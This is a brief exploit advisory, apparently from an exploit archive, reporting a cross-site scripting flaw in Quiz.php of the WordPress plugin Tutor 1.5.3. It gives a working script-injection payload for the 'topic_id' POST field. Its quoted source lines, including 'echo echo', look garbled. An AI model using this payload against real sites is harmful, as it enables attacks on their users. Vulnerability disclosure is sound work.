Share
[-] Tile: Wordpress Plugin tutor.1.5.3 - Cross-Site Scripting  
[-] Author: mehran feizi  
[-] Category: webapps  
[-] Date: 2020.02.12  
===================================================================  
Vulnerable page:  
/Quiz.php  
===================================================================  
Vulnerable Source:  
473: echo echo $topic_id;  
447: $topic_id = sanitize_text_field($_POST['topic_id']);  
===================================================================  
Exploit:  
localhost/wp-content/plugins/tutor/classes/Quiz.php and  
$_POST('topic_id')= <script>alert('mehran')</script>  
=================================================================================